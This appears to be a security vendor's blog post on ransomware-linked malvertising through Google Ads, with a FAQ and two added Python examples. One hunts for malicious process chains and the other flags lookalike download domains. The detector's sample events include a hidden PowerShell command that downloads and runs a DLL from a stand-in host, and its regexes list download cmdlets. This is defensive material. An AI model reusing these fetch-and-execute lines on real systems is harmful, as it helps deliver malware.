Google Ads

Chris Swagler | January 31st, 2023


DEV-0569 is a threat actor using Google Ads in widespread, continuous advertising campaigns to distribute malware, steal victims’ credentials, and ultimately gain the network access used in ransomware attacks. In recent weeks, security researchers have shown that sponsored Google search results have become a primary channel for malicious advertisements spreading malware. The advertisements impersonate the websites of well-known software programs, including LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC.

Ransomware Groups Using Google Ads

When visitors click on the advertisement, they are directed to sites that look like download portals or clones of the software’s legitimate website. Clicking the download links typically delivers an MSI file that installs different malware depending on the campaign. So far, RedLine Stealer, Gozi/Ursnif, Vidar, Cobalt Strike, and various ransomware payloads have been observed. Although numerous threat actors appear to be abusing the Google Ads platform to spread malware, two campaigns stand out because their infrastructure has previously been tied to ransomware operations.

A malware distribution campaign discovered in February 2022 used SEO poisoning to rank sites impersonating popular software in search results. Installing the software offered on those pages launched a then-new malware downloader called BatLoader, which began a multi-stage infection chain that gave the threat actors initial access to victims’ networks. The threat actors behind BatLoader, tracked as DEV-0569, later began promoting their malicious sites with Google Ads. The infections eventually led to the deployment of Royal ransomware on breached networks. Royal ransomware first appeared in September 2022 and is distributed by several threat actors. According to researchers, DEV-0569 is an initial access broker that uses its malware distribution system to breach corporate networks; it either uses the access itself or sells it to other threat actors, including the Royal ransomware group.

On January 21st, 2023, a researcher observed that recent Google ads promoting popular software led to malicious websites hosted on infrastructure managed by DEV-0569. Although the malicious installers in this campaign do not use BatLoader as in past campaigns, they install an information stealer (RedLine) followed by a malware downloader (Gozi/Ursnif). In the current campaign RedLine is used to steal data, including passwords, cookies, and cryptocurrency wallets, while Gozi/Ursnif is used to download additional malware. The new campaign was attributed to DEV-0569 because it used the same Bitbucket repository and the same ads-check[.]com URL seen in the previously disclosed November/December 2022 campaigns.

It is believed that the operators will eventually use the Gozi infection to drop Cobalt Strike, as BatLoader did in prior campaigns. Screenshots of the web panel DEV-0569 uses to track its malware distribution campaign were shared. They show which legitimate programs are being impersonated and that numerous victims around the world were being infected daily. The panel’s data was wiped at the end of each campaign day, but the records carry an incrementing ID; the highest value observed, 63,576, gives a rough estimate of the number of victims the panel has recorded.

A separate but similar Google Ads campaign was discovered using infrastructure previously tied to TA505, the threat group responsible for distributing CLOP ransomware. The threat actors in this campaign deliver malware through websites posing as popular software, including AnyDesk, Slack, Microsoft Teams, and Adobe, and as sites offering IRS W-9 forms. CronUp is tracking the campaign’s domains in a list published on a GitHub page. When the campaign’s malware is installed, it launches a PowerShell script that downloads and executes a DLL from the download-cdn[.] website that TA505 previously used. However, a threat researcher noted that the domain has since changed ownership, and it is unknown whether TA505 is currently using it.
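As an added example that is not part of the original article or of SpearTip’s tooling, the following Python script hunts for the infection chain these campaigns share: an installer launched from a user’s Downloads folder spawns PowerShell with a download command, which in turn loads a DLL from a user-writable path through rundll32 or regsvr32. The event structure, sample events, regular expressions and severity rules are assumptions made for the example. In real Windows telemetry an MSI custom action is often launched by the Windows Installer service’s own msiexec.exe rather than the user’s, so the parent chain can look different and the rules would need tuning against your EDR or Sysmon feed.

```python
import re
from dataclasses import dataclass


# One process-creation event, in the shape a parsed Sysmon Event ID 1 or EDR
# record would have (hypothetical structure chosen for this example).
@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # its command line


# Paths a standard user can write to: a DLL or MSI here came from the user
# (download, dropper), not from an installed program's directory.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(Downloads|AppData)|ProgramData|Windows\\Temp)\\", re.I)

# PowerShell download and obfuscation indicators (heuristic, not exhaustive).
DOWNLOAD_INDICATOR = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|-e(nc|ncodedcommand)?\b)", re.I)

DLL_LOADERS = ("rundll32.exe", "regsvr32.exe")
SHELLS = ("powershell.exe", "pwsh.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid, max_depth=8):
    """Walk parent pointers upward; stop at an unknown PID or the depth limit."""
    chain, cur = [], ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def find_malvertising_chains(events):
    """Return one alert per DLL loader run from a user-writable path whose
    ancestry contains a PowerShell process with a download indicator."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if basename(ev.image) not in DLL_LOADERS or not USER_WRITABLE.search(ev.cmdline):
            continue
        chain = ancestors(ev, by_pid)
        shell = next((p for p in chain if basename(p.image) in SHELLS), None)
        if shell is None or not DOWNLOAD_INDICATOR.search(shell.cmdline):
            continue
        installer = next((p for p in chain if basename(p.image) == "msiexec.exe"), None)
        # High: the full chain from a user-downloaded MSI is visible.
        # Medium: same loader behaviour, but no installer ancestor (chain broken
        # by the Installer service, or a different dropper).
        severity = "high" if installer and USER_WRITABLE.search(installer.cmdline) else "medium"
        alerts.append({
            "pid": ev.pid,
            "severity": severity,
            "chain": [basename(ev.image)] + [basename(p.image) for p in chain],
            "dll_cmdline": ev.cmdline,
        })
    return alerts


# Constructed sample events for this example, not real telemetry.
EXPLORER = r"C:\Windows\explorer.exe"
MSIEXEC = r"C:\Windows\System32\msiexec.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RUNDLL = r"C:\Windows\System32\rundll32.exe"

SAMPLE_EVENTS = [
    ProcEvent(1000, 1, EXPLORER, "explorer.exe"),
    # Chain 1: MSI from Downloads -> PowerShell download -> rundll32 on a dropped DLL
    ProcEvent(2000, 1000, MSIEXEC, r'msiexec.exe /i "C:\Users\alice\Downloads\7-zip_setup.msi"'),
    ProcEvent(2100, 2000, PS,
              "powershell.exe -nop -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
              ".DownloadFile('https://cdn.example/x.dll', $env:APPDATA + '\\x.dll')\""),
    ProcEvent(2200, 2100, RUNDLL, r"rundll32.exe C:\Users\alice\AppData\Roaming\x.dll,DllRegisterServer"),
    # Benign: a shell extension loaded from System32 by explorer
    ProcEvent(3000, 1000, RUNDLL, r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
    # Chain 2: encoded PowerShell -> rundll32 from Windows\Temp, no installer visible
    ProcEvent(4000, 1000, PS, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ProcEvent(4100, 4000, RUNDLL, r"rundll32.exe C:\Windows\Temp\upd.dll,Start"),
    # Benign: an admin script with no loader child
    ProcEvent(5000, 1000, PS, r"powershell.exe -File C:\Scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for a in find_malvertising_chains(SAMPLE_EVENTS):
        print(a["severity"], a["pid"], " -> ".join(reversed(a["chain"])), a["dll_cmdline"])
```

The rule keys on the loader stage rather than on msiexec alone because legitimate installers spawn PowerShell routinely; it is the combination of a download cmdlet in the shell and a DLL executed from a user-writable path that separates the campaign’s behaviour from ordinary software installs. Feeding it a day of process-creation events from the endpoint fleet is the obvious next step.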

Regardless of who owns the domains, the sheer number of malicious Google ads appearing in search results is a significant concern for both consumers and companies. When the campaigns are used to gain initial access to corporate networks, they can lead to data theft, ransomware, and destructive attacks designed to disrupt operations. Google has policies that prohibit ads that attempt to evade its enforcement by masking the advertiser’s identity or impersonating other brands, and it says it enforces them strictly. Google reviews the ads in question and removes them as they are reported and detected.

With ransomware groups and threat actors constantly adopting new methods and techniques, including ad campaigns on platforms like Google Ads that impersonate popular websites, it’s important for companies to stay aware of the current threat landscape and train employees to recognize malicious ads. At SpearTip, our certified engineers work in a continuous investigative cycle at our 24/7/365 Security Operations Center, monitoring companies’ networks for potential ransomware threats and standing ready to respond to incidents at a moment’s notice. Our remediation experts work to restore companies’ operations, reclaim their networks by isolating malware, and recover business-critical assets. The ShadowSpear platform, an integrable managed detection and response tool, uses advanced detection engines powered by artificial intelligence (AI) and attack tactics, techniques, and procedures (TTP) models to detect malicious activity.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.

Frequently Asked Questions

What specific measures can individuals and organizations take to protect themselves from ransomware attacks facilitated through Google Ads?

The campaigns described above depend on a user downloading and running an installer from a lookalike site, so the most effective controls target that step. Obtain software only from the vendor’s official website, reached by typing the address or using a bookmark rather than clicking a sponsored search result, and check that the domain of the download page matches the vendor’s real domain before running anything. Organizations should additionally block ads or filter known malvertising domains at the DNS or proxy layer, remove local administrator rights so that users cannot silently install software, apply application allowlisting to installers launched from Downloads and Temp folders, and run endpoint detection that alerts on installers spawning PowerShell or rundll32. Keeping operating systems and software updated, using unique passwords, and enabling multi-factor authentication remain important, but they limit the damage of a stealer infection rather than prevent the initial compromise.

Are there any indications or patterns that can help identify if a particular Google Ad is potentially malicious or linked to a ransomware group?

The ads in these campaigns copy the vendor’s branding, so the most reliable indicator is the domain. Sponsored results are labelled as ads; check that the displayed URL and the site you actually land on belong to the vendor’s real domain (for example 7-zip.org, not a variation with an extra word, a hyphen, or an unusual top-level domain), and be suspicious of ads that redirect through unfamiliar “download portal” sites before reaching the installer. Unrealistic or too-good-to-be-true offers, poor grammar or spelling, and generic or misleading imagery are additional warning signs.
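To make the domain check above repeatable, here is an added Python example (not from the article or SpearTip) that triages the landing URL of an ad against a table of official vendor domains for some of the products named in this article. The table, the registrable-domain logic and the sample URLs are assumptions for the example: the table must be maintained from the vendors’ own sites, and the registrable-domain function takes the last two labels of the host without a public-suffix list, so country second-level domains such as .co.uk are not handled.

```python
from urllib.parse import urlsplit

# Official domains for some products impersonated in the campaigns. Keys are the
# brand keyword with separators removed. Illustrative table for this example;
# maintain it from the vendors' own sites.
OFFICIAL_DOMAINS = {
    "7zip": {"7-zip.org"},
    "filezilla": {"filezilla-project.org"},
    "libreoffice": {"libreoffice.org"},
    "anydesk": {"anydesk.com"},
    "winrar": {"win-rar.com", "rarlab.com"},
    "vlc": {"videolan.org"},
    "rufus": {"rufus.ie"},
}


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Simplification: no public-suffix list."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def normalize(text: str) -> str:
    # Strip separators so "7-zip", "7_zip" and "7zip" compare equal.
    return "".join(ch for ch in text.lower() if ch.isalnum())


def classify_landing_url(url: str) -> dict:
    """Classify the host of an ad's landing URL as official, lookalike or unknown.

    official  - registrable domain is one of the vendor's real domains
    lookalike - a brand keyword appears in the host but the domain is not official
    unknown   - no known brand keyword in the host (treat as unverified)
    """
    host = (urlsplit(url).hostname or "").lower()
    reg = registrable_domain(host)
    result = {
        "host": host,
        "registrable_domain": reg,
        # Punycode labels can hide homoglyph lookalikes; surface them explicitly.
        "idn": any(label.startswith("xn--") for label in host.split(".")),
    }
    for brand, domains in OFFICIAL_DOMAINS.items():
        if reg in domains:
            return {**result, "brand": brand, "verdict": "official"}
    flat = normalize(host)
    brand = next((b for b in OFFICIAL_DOMAINS if b in flat), None)
    return {**result, "brand": brand, "verdict": "lookalike" if brand else "unknown"}


# Constructed sample URLs for this example; none is a real campaign indicator.
SAMPLE_URLS = [
    "https://www.7-zip.org/download.html",
    "https://7-zip-download.org/setup.msi",
    "https://anydesk-pro.software/",
    "https://www.videolan.org/vlc/",
    "https://xn--filezilla-xyz.example/",   # constructed label, not valid punycode
    "https://example.com/",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        r = classify_landing_url(url)
        print(f'{r["verdict"]:9} brand={r["brand"]!s:12} idn={r["idn"]!s:5} {r["host"]}')
```

The check looks at the hostname only: a generic download-portal host carrying the brand name in its path or page title comes back as unknown, which is the right outcome, since the point is that anything not on the vendor’s own domain should be treated as unverified rather than trusted by appearance.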

Is Google taking any actions or implementing additional safeguards to prevent the misuse of their advertising platform by ransomware groups?

As noted above, Google’s advertising policies prohibit impersonating other brands and masking the advertiser’s identity, and Google removes the ads in question as they are reported and detected. Report suspicious ads to Google when you encounter them, and stay up to date with Google’s security announcements to learn about further measures. Organizations with specific concerns can also reach out to Google’s support or security teams.
